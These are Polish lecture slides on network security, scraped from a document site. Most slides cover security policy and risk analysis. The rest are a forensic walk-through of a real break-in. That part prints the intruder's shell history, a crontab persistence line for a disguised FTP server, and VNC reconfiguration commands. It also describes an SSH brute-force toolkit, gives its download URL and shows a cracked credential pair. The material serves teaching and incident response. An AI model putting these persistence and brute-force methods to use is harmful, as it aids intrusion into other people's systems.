Wykład 1. komputerowych Pojęcia podstawowe główne slajdy. 5 października Igor T. Podolak Instytut Informatyki Uniwersytet Jagielloński

Wielkość: px
Rozpocząć pokaz od strony:

Download "Wykład 1. komputerowych Pojęcia podstawowe główne slajdy. 5 października 2011. Igor T. Podolak Instytut Informatyki Uniwersytet Jagielloński"

Transkrypt

1 Wykład 1 Pojęcia podstawowe główne slajdy 5 października 2011 polityka Instytut Informatyki Uniwersytet Jagielloński 1.1

2 Co obejmuje bezpieczeństwo sieci? bezpieczeństwo operacyjnych bezpieczeństwo plikowych i informacji zabezpieczenie dostępu do uwierzytelnianie użytkowników i danych kryptografia i protokoły identyfikacja i uwierzytelnianie użytkowników jedno i dwukierunkowa funkcje haszujace i podpisy cyfrowe protokoły ustanawiania kluczy systemy zarzadzania kluczami dzielenie tajemnic i kryptografia grupowa systemy z wiedza zerowa kontrola dostępu i wykrywanie intruzów w systemie elektroniczny handel i elektroniczne pieniadze bezpieczne protokoły IP bezpieczeństwo oprogramowania polityka 1.2

3 Typy ataków wirusy kradzież sprzętu wewnętrzne naruszenie praw nieuprawniony dostęp odmowa dostępu do usług (DoS) włamania do systemu nieuprawniony dostęp WiFi kradzież informacji przestępstwa finansowe naruszenia telekomunikacyjne złe użycie aplikacji webowych przestępstwa przeciw aplikacjom sieciowym sabotaż polityka 1.3

4 Metody kontroli wewnętrzne audyty testowanie możliwości włamania do systemu automatyczne narzędzia kontroli audyty przez zewnętrzne firmy specjalistyczne śledzenie aktywności poczty śledzenie aktywności aplikacji webowych brak polityka 1.4

5 Czemu bezpieczeństwo jest istotne? tajność dobre ograniczenia zabezpieczaja przed udostępnieniem poufnych informacji integralność dobrze zaprojektowany system ułatwi zapewnić dokładność informacji w systemie; poprawny poziom uchroni przez zmianami czy usunięciem danych przez osoby nieuprawnione dostępność jeśli ktoś usunie lub zniszczy dane, to poprawny system pozwoli je odtworzyć Pytania: jak istotny jest komputer i przechowywane na nim dane? czy zasady w twoim przedsiębiorstwie wymagaja ustanowienia pewnych poziomów? czy audytorzy w przedsiębiorstwie wymagaja ustalonych poziomów w twoim systemie komputerowym? czy w przewidywalnej przyszłości będziesz potrzebować zwiększonego poziomu? polityka 1.5

6 Analiza ryzyka identyfikacja i ocena zasobów identyfikacja możliwych zagrożeń ocena prawdopodobieństwa ataku wektor zagrożeń źródła pracownicy, sprzataj acy, konkurencja, terroryści, pogoda, zatrudnieni z zewnatrz, wykonawcy zagrożenia kradzież lub utrata sprzętu czy informacji, ujawnienie informacji, szpiegostwo, przestępstwa finansowe, DoS, utrata i zmiana danych, błędy ludzkie, problemy sprzętowe, błędy sprzętowe, złe użycie danych, fizyczne niebezpieczeństwo cele sprzęt komputerowy i telekomunikacyjny, miejsca przechowywania danych, systemy operacyjne, oprogramowanie, dokumentacja, dane, własność intelektualna, poczta komputerowa, telefony i faksy, informacja, zdrowie i bezpieczeństwo polityka 1.6

7 Wektor zagrożeń istnieje szereg zdefiniowanych wektorów zagrożeń wykonawcy przestępstwa finansowe sprzęt telekomunikacyjny terroryści fizyczne niebezpieczeństwo zdrowie i bezpieczeństwo wektory ułatwiaja projektowanie bezpiecznego systemu pozwalaja na odpowiedzi na pytania typu Po co nam wewnętrzna kontrola jeśli mamy zaporę (firewall)? poprzez wskazanie różnych dróg polityka 1.7

8 modele lizaka pojedyncza zapora wokół zasobów (ang. lollipop) system nie zabezpieczony po przekroczeniu ogrodzenia system nie ustala poziomów nie zabezpiecza przed wewnętrznymi atakami podstawowym narzędziem jest tu zapora ogniowa (firewall) cebulkowy szereg warstw określajacych kolejne poziomy warstwy dostępu, identyfikacji, audytu, monitorowania, segmentacji, fizycznej ochrony włamywacz musi pokonać szereg kolejnych zabezpieczeń możliwe określenie poziomów zaufania często jest tylko jeden sposób identyfikacji, np. hasło większość identyfikacji może być zbudowana w postaci warstwowej polityka 1.8

9 modele strefy zaufania systemy lizaka i cebulkowy sa bardzo trudne do połaczenia, np. w przypadku połaczania firm czy też głębszej współpracy (szczególnie gdy jest czasowa) podział systemu w zależności od funkcjonalności różne poziomy zaufania do różnych części systemu konieczne bardzo dobre śledzenie interfejsów pomiędzy różnymi częściami systemu wykorzystanie reguł zapór i list kontroli dostępu ACL polityka 1.9

10 bezpieczeństwo z punktu widzenia użytkowników ograniczenia użytkowników konfiguracja systemu jest z jednej strony ograniczajaca dla użytkowników pozwalajac im na mniej, z drugiej strony wzmacnia ona użytkowników przez usunięcie niepotrzebnych zadań i zabezpieczenie przed popełnieniem błędów ograniczanie użytkowników do pewnych funkcji ograniczanie pewnych funkcji systemu ustalanie kto może korzystać z których zasobów zabezpieczenie przed niepoprawnym użyciem jak monitorować działanie planu? polityka 1.10

11 Polityka (security policy) podstawowe wskazania w jaki sposób należy chronić fizyczne i informacyjne zasoby firmy podstawowy sposób w jaki oczekiwania zarzadu względem sa tłumaczone na zestaw sprawdzalnych celów reguły polityki zawieraja reguły ułatwiajace ochronę wartościowych, tajnych, podlegajacych prawom własności zasobów wykluczyć badź zminimalizować ewentualna odpowiedzialność prawna wobec osób trzecich ograniczyć straty czy złe wykorzystanie zasobów firmy polityka reguły polityki s a w formie pisanej reguły polityki mówi a co ma być zrobione nie jak to ma być zrobione 1.11

12 reguły polityki zapewniaja tajność i spójność danych zabezpieczaja przed ich niepoprawnym użyciem pozwalaja użytkownikom zrozumieć co jest od nich oczekiwane kadra zarzadzaj aca by wiedzieli jakie sa ich role, odpowiedzialność, i jakie powinni podejmować działania kadra techniczna by wiedzieli jak, kiedy, i gdzie kontrola może być użyta w sieci komputerowej, zasobach, innym sprzęcie wszyscy zatrudnieni by wiedzieli w jaki sposób maja wypełniać codzienne obowiazki by być zgodnymi z oczekiwaniami polityka 1.12

13 tworzenie reguł polityki w tworzeniu reguł musi wziać udział wiele działów HR odpowiedzialne za zatrudnianie i karanie pracowników; zbiera od pracowników certyfikaty, że zrozumieli reguły dział prawny odpowiedzialny za reprezentację firmy wewnatrz i na zewnatrz; zgodność reguł polityki z prawem IT gdyż pracownicy tego działu sa zwykle największymi konsumentami zasobów jednak nie oni powinni być głównymi autorami reguł ochrona fizyczna polityka adresatami reguł polityki sa wszyscy pracownicy wykonawcy, kontraktorzy, konsultanci, serwis, pracownicy czasowi partnerzy biznesowi, sprzedawcy klienci korzystajacy z zasobów informacyjnych 1.13

14 organizacja polityki reguły polityki odnosza się do zwykle do administracji systemem; z jakich należy korzystać narzędzi; czego firma oczekuje od administratorów zarzadzania personelem mówia pracownikom w jaki sposób maja wykonywać codzienne zadania, np. w jaki sposób operować z wrażliwymi danymi fizycznego generalnie do wszystkich w jaki sposób radzić sobie z bezpieczeństwem fizycznym polityka reguły mówia co musi być zrobione reguły nie mówia w jaki sposób ma to być zrobione implementacja musi być oddzielona od samych reguł reguły nie moga zależeć od konkretnych technologii by być skuteczne, reguły musza być jasne i łatwe do zrozumienia 1.14

15 Rekonesans IP najpierw konieczne wykrycie prawdopodobnych nazw domen w standardowych spisach wykrycie właścicieli domen w systemach rejestrujacych wyszukiwanie wszystkich domen posiadanych przez organizację whois ICANN dla domen.com,.net,.org dla innych inne serwery whois USA: Europa:www.ripe.net, domeny.com,.org,.net,.edu: inne narzędzia whois is usługa powinna działać na porcie 43, obecnie głównie przez http polityka 1.15

16 planowanie elementów procesu bezpieczeństwo fizyczne jak zabezpieczyć sprzęt i nośniki danych to nie jest część systemu, jednak jest ściśle zwiazane aplikacje opis celów podstawowych obiektów i zasobów systemu podstawa dla dalszych kroków, nie jest wprowadzana do systemu ogólne podejście jaki będzie ogólny poziom wybór odpowiednich parametrów grupy użytkowników ustalenie zasad podziału użytkowników na grupy profile użytkowników przypisanie użytkowników do grup zdefiniowanie istotnych elementów odróżniajacych grupy bezpieczeństwo zasobów instalacje aplikacji polityka 1.16

17 planowanie elementów procesu bezpieczeństwo fizyczne aplikacje ogólna strategia jaki będzie ogólny poziom wybór odpowiednich parametrów grupy użytkowników ustalenie zasad podziału użytkowników na grupy profile użytkowników przypisanie użytkowników do grup zdefiniowanie istotnych elementów odróżniajacych grupy bezpieczeństwo zasobów które zasoby (aplikacje) powinny być dostępne dla wszystkich, które dla niektórych definicje grup użytkowników instalacje aplikacji decyzja jak ustalać własność aplikacji i bibliotek w systemie polityka 1.17

18 bezpieczeństwo fizyczne gdzie postawić sprzęt komputerowy? jakie ma wymagania? jakie sa potencjalne ryzyka (np. wyłaczenie systemu)? najlepiej w zamkniętym pomieszczeniu o ograniczonym dostępie utworzyć formularz fizycznego z podstawowymi odpowiedziami: jakie sa wykorzystane metody zabezpieczenia, gdzie jest przechowywany klucz do dostępu, jakie sa standardowe ustawienia, inne. gdzie przechowywać dokumentację i nośniki danych gdzie umieszczone będa wszystkie stacje robocze? gdzie drukarki? jakiego dodatkowego sprzętu potrzebujemy (okablowanie, linie telefoniczne, etc.)? co robić w przypadkach awaryjnych (pożar, zalanie wod a, etc.)? polityka 1.18

19 bezpieczeństwo fizyczne gdzie postawić sprzęt komputerowy? jakie ma wymagania? jakie sa potencjalne ryzyka (np. wyłaczenie systemu)? gdzie przechowywać dokumentację i nośniki danych narzędzia serwisowe i hasła dostępu administratora sa krytyczne dla działania systemu urzadzenia kopii zapasowych i media moga zostać skradzione lub zniszczone gdzie umieszczone będa wszystkie stacje robocze? stacje robocze moga być użyte przez nieuprawnione osoby (dostęp w miejscach publicznych, nienadzorowana praca w miejscach prywatnych) nie umieszczać w bardzo publicznych lub bardzo prywatnych miejscach zwracać uwagę użytkownikom na konieczność wylogowywania się z systemu po zakończeniu pracy ograniczać które funkcje systemu użytkownicy moga wykonywać w miejscach publicznych ograniczać możliwość logowania w wielu miejscach gdzie drukarki? jakiego dodatkowego sprzętu potrzebujemy (okablowanie, linie telefoniczne, etc.)? co robić w przypadkach awaryjnych (pożar, zalanie woda, etc.)? polityka 1.19

20 bezpieczeństwo fizyczne gdzie postawić sprzęt komputerowy? jakie ma wymagania? jakie sa potencjalne ryzyka (np. wyłaczenie systemu)? gdzie przechowywać dokumentację i nośniki danych narzędzia serwisowe i hasła dostępu administratora sa krytyczne dla działania systemu urzadzenia kopii zapasowych i media moga zostać skradzione lub zniszczone gdzie umieszczone będa wszystkie stacje robocze? stacje robocze moga być użyte przez nieuprawnione osoby (dostęp w miejscach publicznych, nienadzorowana praca w miejscach prywatnych) gdzie drukarki? drukarki w miejscach publicznych moga pozwolić na nieuprawniony dostęp do informacji w przypadku małej liczby drukarek może się okazać, że trzeba będzie drukować poufne wiadomości (np. czeki) w publicznych miejscach zwracać uwagę pracownikom na nie zwiazane z drukiem w publicznych miejscach nie ustawiać drukarek w publicznych miejscach drukować poufne informacje tylko w ustalonych porach utworzyć opis wszystkich drukarek wraz z zagrożeniami jakiego dodatkowego sprzętu potrzebujemy (okablowanie, polityka 1.20

21 planowanie aplikacji jakie informacje zamierzamy przechowywać w systemie? kto będzie potrzebował dostępu do tych informacji? czy użytkownicy potrzebuja dostępu tylko do czytania czy także do zmiany? konieczne jest określenie które aplikacje będa wykorzystywane do dostępu do danych tu przydatny diagram dostępu aplikacji do bibliotek polityka 1.21

22 tworzenie ogólnej strategii najpierw decyzje co do ogólnego podejścia do w systemie konieczne wyrównanie potrzeb dzisiaj i tych w przyszłości tworzenie strategii wybór poziomu uproszczony, średni, wysoki wykorzystaj opis aplikacji dla określenia kto powinien mieć dostęp do których oceń wykorzystywane w systemie technologie, np. jest czy nie ma dostępu do Internetu przedyskutuj kwestię poziomu z audytorami określ wymagania względem krytycznych zasobów: ich tajność, ich kompetytywność, ich wykorzystanie w ciagu dnia pracy wybór parametrów zwiazanych z logowaniem się użytkowników w systemie wybór parametrów zwiazanych z hasłami wykorzystanie wartości systemowych do wyregulowania systemu polityka 1.22

23 zauważyłem w historii swojego komputera ul.ii.uj.edu.pl 960 uptime 961 df -h 962 pwd 963 ps x 964 mkdir.init 965 cd.init polityka 966 wget 967 tar zxf ftpd tar.gz 968 rm ftpd tar.gz 969 mv ftp4all/*. 970 rmdir 971./configure czy to było włamanie??? 1.23

24 ściagnięty serwer ftp ftp4all, kompilacja instalacja do specjalnie zalożonej kartoteki.init w mojej kartotece domowej skopiowane wszystkie pliki z.init/bin do.init/standard/sbin, nastepnie przekopiowal standard/sbin do sbin zmiana nazwy wykonywalnego pliku na xvmr - czy z czymś się kojarzy? podkartoteka ze źródłami wymazana, jednak ftp4all jest do ściagnięcia i można powtórzyć prawdopodbne operacje w etc/ftpd.reg ustawione sa adminport numer portu obsługi dla administratora ftp port 5902 w /home/igor/.init/f numer portu gdzie serwer jest dostępny 5902 to jeden z portow wykorzystywanych przez Xvnc otwarty na komputerze włamywacz musiał wcześniej skanować porty polityka 1.24

25 W plikach msg/goodbye, msg/welcome, i msg/startup szereg zabawnych komunikatów: msg/startup: FTP server ready. Preceeding... polityka msg/welcome: Welcome, 2 Another Great Server BY, -=FLOTILLA=msg/goodbye: GOOdBye, Hope 2 See U Again SOON...(= zabawne, prawda? 1.25

26 Crontab edycja mojej lokalnej tablicy cron, polegajaca na stałym uruchamianiu pliku xvmr, patrz lokalna tablica crontab: * * * * /home/igor/.init/sbin/xvmr a więc co minutę. poprawka naniesiona była 2 sierpnia o 19:45; to lokalizuje datę włamania polityka 1.26

27 Skad to włamanie? W pliku /var/log/secure, pomiędzy wieloma nieudanymi, jest niepokojacy wpis, powtarzajacy się wiele razy August 2: 15:51:26: Address maps to sip.ber this does not map back to the address - POSSIBLE BREAKI po wykorzystaniu odwrotnego mapowania dig -x dostajemy nazwę sip.bernaunet.de, jednak mapowanie wprost dig sip.bernaunet.de zwraca adres , stad to ostrzeżenie. poszukiwanie przez WWW adresu daje stronę firmy Wikom Elektrik GmbH włamywacz uruchamia swój program z wielu miejsc na świecie (albo jest ich wielu), gdzie włamał sie juz wcześniej nie wiadomo wciaż jaki jest oryginalny adres wlamywacza polityka 1.27

28 Xvnc last -f./wtmp nie pokazuje żadnego logowanie w okolicach feralnych modyfikacji ale wykorzystał dla ftp port 5902, a więc port Xvnc, a serwer Xvnc był uruchomiony, a także klient Xvnc dostał sie pewnie przez zalogowanie do otwartego wtedy połaczenia Xvnc ekran klienta Xvnc po ponownym połaczeniu z serwerem jest czarny i nic nie pomaga w jego uaktywnieniu, a serwer Xvnc na pewno dziala Czy Xvnc zapisuje gdzieś ślady dostępu??? ostatnie polecenie włamywacza to 1000 vncconfig -set AcceptpointerEvents=0 ; vncconfig -set AcceptkeyEvents=0 ; exit w której zmienia ustawienia konfiguracji vnc! Oto znaczenia zmienionych parametrów Xvnc polityka AcceptPointerEvents: Accept pointer press and release e clients (default is on). tu włamywacz wyłaczył dzialanie myszki (pointer) 1.28

29 a co jest w środku? W kartotece.init/f sa bardzo dziwne pliki: drwxrwxr-x 5 igor igor 4096 Aug 2 19:51. drwxrwxr-x 11 igor igor 4096 Aug 2 19:41.. drwx igor igor 4096 Aug 2 19:48???? 100MBiT.PL 10GB LINUX??? drwx------??? 2 igor igor 4096 Aug 2 19:48???? Dupe-FxP? polityka? drwx igor igor 4096 Aug 2 FLOTILLA procesu??? -rw igor igor 48 Aug 2 19:49.permissions Pliki.permissions w podkartotekach sa identyczne, jednak różne od tego w glownej podkartotece f w historii włamania jest polecenie utworzenia podkartoteki f, jednak nie sa utworzone żadne dalsze podkartoteki czy same pliki.permissions wyglada na to, że włamywacz utworzył sam serwer ftpd 1.29

30 połaczenie z serwerem następuje przez ftp ul 5902 poł aczenie z portem administracji nie powodzi się (telnet ul 60283) włamywacz albo źle zainstalowal serwer albo nie miał zamiaru nim administrować polityka 1.30

31 Błędy włamywacza nie wyczyscił historii poleceń uruchomiony proces /home/igor/.init/xvmr wyświetla się w liście procesów ps -aux grep igor nie usunał wielu zbędnych już plikow z kartoteki.init, a usunał pliki źródłowe nie zadbał o to, by crontab nie wysyłał co chwilę maila o uruchomieniu serwera, np. From Mon Aug 7 11:01: Date: Mon, 7 Aug :01: From: (Cron Daemon) To: polityka Subject: Cron /home/igor/.init/sbin/xvmr X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/home/igor> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=igor> X-Cron-Env: <USER=igor> FTP4ALL 3.012, Copyright (C) by Crescent (cre This program is FREE SOFTWARE and distributed under GNU 1.31 ale kto czyta pocztę roota?

32 co robić? wykasować kartotekę serwera ftpd, usunać wpis z tablicy crontab poczekać na połaczenie by wykryć włamywacza zmienić hasło uzytkownika igor sprawdzić tego użytkownika na innych komputerach ustawić blokadę dostępu do połaczeń tcp wykorzystujac tcp_wrappers sprawdzić adres użytkownika, ktory odgadł haslo polityka 1.32

33 Prosty skrypt uruchomiłem prosty skrypt #!/usr/bin/perl open(logfile, ">>slad.txt"); while(true) { $s = netstat --tcp grep "ul.ii.uj.edu.pl:5902\\ ul } if(length($s) > 0) { $d = date ; chomp $d; chomp $s; print LOGFILE "\$d:\n\$s\n"; $s = ""; } $p = sleep 60; majacy wyłapac wszelkich potencjalnych "klientów" serwera, w domyśle włamywacza, bo któż inny może o założonym serwerze wiedziec? ale może włamywacz umieścił gdzieś informację i linki o nowym serwerze? polityka 1.33

34 Ktoś korzysta! po kilku dniach plik śladu (ślad.txt) troche sie zapełnił: wlamanie]$ cat slad.txt Fri Aug 4 12:30:22 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 aae92.internetdsl.tpn:52760 ESTABLISHE Fri Aug 4 12:31:22 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 aae92.internetdsl.tpn:52760 ESTABLISHE Fri Aug 4 12:32:22 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 aae92.internetdsl.tpn:52760 FIN\_WAIT2 Sun Aug 6 10:39:32 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:40:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304politykaESTABLISHE Sun Aug 6 10:41:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:42:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:43:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:44:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:45:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:46:34 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:47:34 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 16:49:11 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl: :1253 ESTABLISHE wlamanie]$ Pierwsze 3 linijki to moja wlasna proba, reszta to 1.34

35 Ale co z tego? listing kartoteki.init/f (a wiec korzenia nowego serwera ftp) daje f]$ ll total 32 drwx igor 4096 Aug 2 19:48???? 100MBiT.PL 10GB LINUX???? drwx igor 4096 Aug 2 19:48???? Dupe-FxP????? drwx igor 4096 Aug 2 drwx igor 4096 Aug 6 10:45 Spikes.Women.of.Action.2006.WS.PDTV.XviD-PAP polityka więc, nowy użytkownik załozył nowa kartoteka Spikes.Women.of.Action w której jest trochę nowych plików: Spikes.Women.of.Action.2006.WS.PDTV.XviD-PAP]$ ll total rw igor 6518 Aug 6 10:39 PAP-Spikes.Women.of.Act -rw igor Aug 6 10:39 PAP-swoa.r00 -rw igor Aug 6 10:39 PAP-swoa.r01 -rw igor Aug 6 10:40 PAP-swoa.r02 -rw igor Aug 6 10:40 PAP-swoa.r03 -rw igor Aug 6 10:40 PAP-swoa.r04 -rw igor Aug 6 10:40 PAP-swoa.r05 -rw igor Aug 6 10:41 PAP-swoa.r

36 I co jeszcze? a w kartotece.init/f/sample jest plik -rw igor igor Aug 6 10:39 Spikes.Wom razem wiec ok. 350 MB. to po prostu aktywne kobiety, dobrej jakości filmy istnieje coś takiego jak WOA Women of Action Network dig ujawnia domenę reardenstudios.com i serwer homer.reardenstudios.com ( czyżby chcieli ułatwić sobie przekaz? polityka 1.36

37 Sprzatanie skasowany server vnc zmiana hasła użytkownika igor list do z ostrzeżeniem, gdyż jeden z ataków byl przeprowadzony z adresu , ktory mapował się na sip.bernaunet.de a ten na nawww.bernaunet.de, a to była firma Wikom Elektrik GmbH w Bernie odpowiedź w bardzo szybkim tempie (mniej niż 20 minut) z we have taken the affected machine of the net and have exchanged for another. We will analyze the log files and refund announcement against the suitable person. We apologise for your incommodities and can assure you from this server no more attack will go out. MfG bernaunet.de w odpowiedzi na pytanie o szczegóły następujaca odpowiedź a user s account ran obviously whole thus of the hackers has cracked. Then a Kernelbug must have been used with the help of the software to get root rights. polityka 1.37

38 Co robił włamywacz? loguje sie kolejno na kontach sven i potem mtvs sciaga linux3.tgz (w kartotece linux3) z members.lycos.co.uk/neneax/linux3.tgz, rozpakowuje go do kartoteki.m to jest open source irc bot written in C - patrz ściaga z tego samego adresu scanx.tgz rozpakowujac do kartoteki chyba.de (niemiecka domena - firma jest w bernie, ale w niemieckiej domenie) ściaga tez plik de, ktory jest słownikiem niemieckich imion i innych prawdopodobnych nazw użytkowników uruchamia wtedy.de/x (przykładowa nazwa domeny) ten jest skryptem uruchamiajacym.de/scan $1 22, czyli./de scan , a 22 to numer portu ssh - innymi słowy wyszukiwanie serwerów domenie wykorzystujacych ssh, zapisujac ja w pliku uniq.txt polityka 1.38

39 Co robił włamywacz? zbiera listę serwerów i uruchamia.de/xpl 100 german, a więc zapewne po 100 prób na każdym z serwerow xpl próbuje się jednocześnie połaczyc z wieloma serwerami z listy z uniq.txt na każdym próbujac tego samego użytkownika, i zapewne, to samo hasło W ten sposób wielokrotnie przyspiesza działania - mimo, że każda próba logowania trwa ok. 3 sekund, to próbujac kilkaset serwerow jednocześnie dostajemy przyspieszenie a gdzie wyniki? chyba sa online??? bo to GOT...??? albo tez sa zapisywane w pliku vuln.txt xpl jest bardzo podobne do ssh to jakaż przeróbka polityka 1.39

40 Co robił włamywacz? strings xpl pokazuje między innymi %sgot IT!! -> %s:%s:%s jest to więc jakieś wypisanie wyniku, tak jak wyżej jest GOT IT./x > billing:habl99: ale nie jest nigdy ten plik ogladany na koncu wlamywacz oglada plik vuln.txt i później (razem z log.txt, status, i uniq.txt) usuwa go mimo przyspieszenia byłoby dobrze, gdyby włamywacz nie musiał kontrolować działania bezpośrednio i wyniki logowania były wysyłane co jakiś czas dla ulatwienia polityka 1.40

41 J. Pieprzyk, T. Harjano, J. Seberry, Teoria, Springer/Helion N. Ferguson, B. Schneier, Kryptografia w praktyce, Helion B. Schneier, Kryptografia dla praktyków, Wiley / WNT D. Denning, Wojna informacyjna i bezpieczeństwo informacji, ACM/WNT A. Menezes, P. Van Oorschot, S. Vanstone, Handbook of applied Cryptography, CRC (http://www.cacr.math.uwaterloo.ca/hac/) J. Viega, M. Messier, C i C++ bezpieczne programowanie: receptury, O Reilly/Helion S. Oaks, Java a bazpieczeństwo, O Reilly/RM C. Peikari, A. Chuvakian, Strażnik danych, O Reilly/Helion polityka 1.41

BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH

BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH Igor T. Podolak Instytut Informatyki UJ 8 październik 2008 IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 1 / 35 CO OBEJMUJE

Bardziej szczegółowo

ZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ

ZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ ZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ WYMAGANIA BEZPIECZEŃSTWA DLA SYSTEMÓW IT Wyciąg z Polityki Bezpieczeństwa Informacji dotyczący wymagań dla systemów informatycznych. 1 Załącznik Nr 3 do Część II SIWZ Wymagania

Bardziej szczegółowo

Wykład 6: Bezpieczeństwo w sieci. A. Kisiel, Bezpieczeństwo w sieci

Wykład 6: Bezpieczeństwo w sieci. A. Kisiel, Bezpieczeństwo w sieci N, Wykład 6: Bezpieczeństwo w sieci 1 Ochrona danych Ochrona danych w sieci musi zapewniać: Poufność nieupoważnione osoby nie mają dostępu do danych Uwierzytelnianie gwarancja pochodzenia Nienaruszalność

Bardziej szczegółowo

1. Zakres modernizacji Active Directory

1. Zakres modernizacji Active Directory załącznik nr 1 do umowy 1. Zakres modernizacji Active Directory 1.1 Opracowanie szczegółowego projektu wdrożenia. Określenie fizycznych lokalizacji serwerów oraz liczby lokacji Active Directory Określenie

Bardziej szczegółowo

2.11. Monitorowanie i przegląd ryzyka 2.12. Kluczowe role w procesie zarządzania ryzykiem

2.11. Monitorowanie i przegląd ryzyka 2.12. Kluczowe role w procesie zarządzania ryzykiem Spis treści Wstęp 1. Wprowadzenie 1.1. Co to jest bezpieczeństwo informacji? 1.2. Dlaczego zapewnianie bezpieczeństwa informacji jest potrzebne? 1.3. Cele, strategie i polityki w zakresie bezpieczeństwa

Bardziej szczegółowo

Spis treści Wstęp 1. Wprowadzenie 2. Zarządzanie ryzykiem systemów informacyjnych

Spis treści Wstęp 1. Wprowadzenie 2. Zarządzanie ryzykiem systemów informacyjnych Wstęp... 13 1. Wprowadzenie... 15 1.1. Co to jest bezpieczeństwo informacji?... 17 1.2. Dlaczego zapewnianie bezpieczeństwa informacji jest potrzebne?... 18 1.3. Cele, strategie i polityki w zakresie bezpieczeństwa

Bardziej szczegółowo

System Kancelaris. Zdalny dostęp do danych

System Kancelaris. Zdalny dostęp do danych Kancelaris krok po kroku System Kancelaris Zdalny dostęp do danych Data modyfikacji: 2008-07-10 Z czego składaj adają się systemy informatyczne? System Kancelaris składa się z dwóch części: danych oprogramowania,

Bardziej szczegółowo

Instrukcja konfiguracji funkcji skanowania

Instrukcja konfiguracji funkcji skanowania Instrukcja konfiguracji funkcji skanowania WorkCentre M123/M128 WorkCentre Pro 123/128 701P42171_PL 2004. Wszystkie prawa zastrzeżone. Rozpowszechnianie bez zezwolenia przedstawionych materiałów i informacji

Bardziej szczegółowo

Bezpieczeństwo danych i systemów informatycznych. Wykład 1

Bezpieczeństwo danych i systemów informatycznych. Wykład 1 Bezpieczeństwo danych i systemów informatycznych Wykład 1 1. WPROWADZENIE 2 Bezpieczeństwo systemu komputerowego System komputerowy jest bezpieczny, jeśli jego użytkownik może na nim polegać, a zainstalowane

Bardziej szczegółowo

Administrowanie sieciowymi systemami operacyjnymi

Administrowanie sieciowymi systemami operacyjnymi REFORMA 2012 Administrowanie sieciowymi systemami operacyjnymi Krzysztof Pytel, Sylwia Osetek Kwalifikacja E.13.3 Podręcznik do nauki zawodu TECHNIK INFORMATYK Administrowanie.indd 1 2012-12-27 16:44:39

Bardziej szczegółowo

7. zainstalowane oprogramowanie. 8. 9. 10. zarządzane stacje robocze

7. zainstalowane oprogramowanie. 8. 9. 10. zarządzane stacje robocze Specyfikacja oprogramowania do Opis zarządzania przedmiotu i monitorowania zamówienia środowiska Załącznik nr informatycznego 1 do specyfikacji Lp. 1. a) 1. Oprogramowanie oprogramowania i do systemów

Bardziej szczegółowo

Doskonalenie podstaw programowych kluczem do modernizacji kształcenia zawodowego

Doskonalenie podstaw programowych kluczem do modernizacji kształcenia zawodowego rojekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego 9. Administracja sieciowymi systemami operacyjnymi Uszczegółowione efekty kształcenia Uczeń po zrealizowaniu zajęć

Bardziej szczegółowo

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne Jarosław Kuchta Internetowe Usługi Informacyjne Komponenty IIS HTTP.SYS serwer HTTP zarządzanie połączeniami TCP/IP buforowanie odpowiedzi obsługa QoS (Quality of Service) obsługa plików dziennika IIS

Bardziej szczegółowo

CitiDirect Online Banking - portal CitiDirect EB

CitiDirect Online Banking - portal CitiDirect EB CitiDirect Online Banking - portal CitiDirect EB Dodatkowa informacja dotycząca konfiguracji zabezpieczeń oprogramowania Java Pomoc Techniczna CitiDirect CitiService Pomoc Techniczna CitiDirect Tel. 0

Bardziej szczegółowo

POLITYKA BEZPIECZEŃSTWA w zakresie ochrony danych osobowych w ramach serwisu zgloszenia24.pl

POLITYKA BEZPIECZEŃSTWA w zakresie ochrony danych osobowych w ramach serwisu zgloszenia24.pl POLITYKA BEZPIECZEŃSTWA w zakresie ochrony danych osobowych w ramach serwisu zgloszenia24.pl SPIS TREŚCI I. POSTANOWIENIA OGÓLNE... 2 II. DEFINICJA BEZPIECZEŃSTWA INFORMACJI... 2 III. ZAKRES STOSOWANIA...

Bardziej szczegółowo

Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych

Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych Krzysztof Młynarski (krzysztof.mlynarski@teleinformatica.com.pl) Teleinformatica Pomimo występowania bardzo wielu

Bardziej szczegółowo

Poziomy wymagań Konieczny K Podstawowy- P Rozszerzający- R Dopełniający- D Uczeń: - zna rodzaje sieci - zna topologie sieciowe sieci

